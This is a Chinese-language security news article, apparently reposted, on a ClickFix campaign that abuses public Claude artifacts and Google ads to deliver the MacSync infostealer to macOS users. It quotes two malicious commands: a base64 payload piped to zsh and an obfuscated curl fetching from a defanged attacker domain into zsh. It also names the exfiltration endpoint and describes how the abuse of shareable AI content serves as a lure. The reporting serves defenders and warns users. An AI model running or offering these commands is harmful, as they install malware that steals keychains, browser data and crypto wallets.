文章总结： 威胁行为者滥用ClaudeLLM的公开作品和Google广告，在ClickFix攻击中向macOS用户推送MacSync信息窃取程序。攻击者针对特定搜索查询投放恶意内容，诱导用户将恶意shell命令粘贴到终端，从而下载并执行窃取敏感信息的恶意软件。建议用户避免执行不理解的命令，并可通过询问聊天机器人来验证命令安全性。 综合评分： 78 文章分类： 威胁情报,恶意软件,社会工程学,终端安全,AI安全

Claude LLM 的工件被用于在 ClickFix 攻击中推送 Mac 信息窃取程序

原创

ZM ZM

暗镜

2026年2月14日 07:51 辽宁

威胁行为者正在 ClickFix 活动中滥用 Claude 工具和 Google 广告，向搜索特定查询的 macOS 用户投放信息窃取恶意软件。

目前已观察到至少两种恶意活动的变种，超过 10,000 名用户访问了带有危险指令的内容。

Claude 作品是指使用 Antropic 的 LLM 生成并由作者公开的内容。它可以是任何形式的输出，例如说明、指南、代码片段或其他类型的输出，这些输出与主聊天内容隔离，任何人都可以通过 claude.ai域名上的链接访问。

作品页面会警告用户，显示的内容是由用户生成的，未经核实其准确性。

MacPaw 的调查部门 Moonlock Lab 和广告拦截公司 AdGuard 的研究人员注意到，针对“在线 DNS 解析器”、“macOS CLI 磁盘空间分析器”和“HomeBrew”等多个查询，都显示了恶意搜索结果。

恶意搜索结果通过谷歌搜索推广，用户要么会访问公开的 Claude 恶意软件，要么会看到一篇冒充苹果官方支持的 Medium 文章。在这两种情况下，用户都会被指示将 shell 命令粘贴到终端中。

• 在第一种攻击变体中，执行的命令是：‘echo "..." | base64 -D | zsh,’
• 而第二个则是：‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’。

Moonlock 的研究人员发现 ，恶意 Claude 指南已经获得了至少 15,600 次浏览，这可能表明有很多用户上当受骗。

AdGuard 的研究人员几天前也观察到了同样的指南，当时它的浏览量为 12,300 次。

在终端中运行该命令会获取MacSync 信息窃取程序的恶意软件加载器，该加载器会窃取系统中存在的敏感信息。

研究人员表示，该恶意软件使用硬编码的令牌和 API 密钥与命令与控制 (C2) 基础设施建立通信，并伪造 macOS 浏览器用户代理以融入正常活动。

研究人员表示：“响应直接传递给 osascript——AppleScript 处理实际的窃取操作（钥匙串、浏览器数据、加密钱包）。”

窃取的数据被打包成一个名为“/tmp/osalogging.zip”的压缩文件，然后通过HTTP POST请求上传到攻击者位于a2abotnet[.]com/gate的C2服务器。如果上传失败，压缩文件会被分割成更小的片段，并重试上传八次。上传成功后，会执行清理步骤删除所有痕迹。

MoonLock Lab 发现，这两个变种都从同一个 C2 地址获取第二阶段，这表明观察到的活动背后是同一个威胁行为者。

类似的攻击活动利用 ChatGPT 和 Grok 的聊天共享功能传播 AMOS 信息窃取程序。2025 年 12 月，研究人员发现 ChatGPT 和 Grok 的对话被用于 ClickFix 攻击，攻击目标是 Mac 用户，随后该攻击活动得到了推广。

Claude 的攻击变体表明，滥用行为已经扩展到其他大型语言模型 (LLM)。

建议用户谨慎行事，避免在终端中执行自己不完全理解的命令。正如卡巴斯基研究人员此前指出的，在同一对话中向聊天机器人询问所提供命令的安全性，是判断其是否安全的直接方法。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：暗镜 ZM ZM《Claude LLM 的工件被用于在 ClickFix 攻击中推送 Mac 信息窃取程序》